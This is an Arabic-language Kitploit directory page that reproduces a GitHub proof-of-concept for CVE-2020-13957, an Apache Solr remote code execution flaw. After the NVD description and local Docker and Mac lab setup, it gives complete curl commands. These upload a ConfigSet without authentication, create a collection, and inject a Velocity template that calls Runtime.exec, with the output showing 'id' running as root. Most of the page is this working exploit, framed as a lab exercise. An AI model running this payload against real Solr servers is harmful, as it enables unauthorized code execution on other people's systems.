Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-13957 — Apache Solr RCE CVE-2020-13957 | Kitploit
أدوات/GitHubGitHub/s-index/cve-2020-13957
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubs-index/cve-2020-13957

CVE-2020-13957

Apache Solr RCE CVE-2020-13957

عرض المستودع
113منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Apache Solr RCE CVE-2020-13957

عرض Docker التوضيحي

docker-demo

عرض Mac التوضيحي

mac-demo

وصف NVD CVE-2020-13957

NVD CVE-2020-13957

root@kitploit:~
Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.

Docker

إعداد بيئة PoC

1. بناء صورة من Dockerfile

root@kitploit:~
$ docker build -t cve-2020-13957 .

2. تشغيل /bin/bash في حاوية جديدة

root@kitploit:~
تنزيل الأداة
$ docker run --rm -p 8983:8983 --name cve-2020-13957 -it cve-2020-13957 /bin/bash

3. تشغيل Apache Solr Cloud في الحاوية

root@kitploit:~
$ ./solr start -e cloud -noprompt -force

الاستغلال

1. رفع ConfigSet

دليل Apache Solr رفع ConfigSet

root@kitploit:~
$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"

2. إنشاء Collection

دليل Apache Solr إنشاء Collection

root@kitploit:~
$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet"

3. تنفيذ أمر id

root@kitploit:~
$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27id%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end"

المخرجات

root@kitploit:~
     0  uid=0(root) gid=0(root) groups=0(root)

Mac

إعداد بيئة PoC

1. تنزيل Apache Solr

root@kitploit:~
$ curl -OL https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz

2. فك الضغط

root@kitploit:~
$ tar -xzvf solr-8.2.0.tgz

3. تشغيل Apache Solr Cloud

root@kitploit:~
$ solr-8.2.0/bin/solr start -e cloud -noprompt -force

الاستغلال

1. رفع ConfigSet

دليل Apache Solr رفع ConfigSet

root@kitploit:~
$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet"

2. إنشاء Collection

دليل Apache Solr إنشاء Collection

root@kitploit:~
$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet"

3. فتح الآلة الحاسبة

root@kitploit:~
$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27open+-a+calculator%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end"

المراجع

  • https://github.com/Imanfeng/Apache-Solr-RCE#cve-2020-13957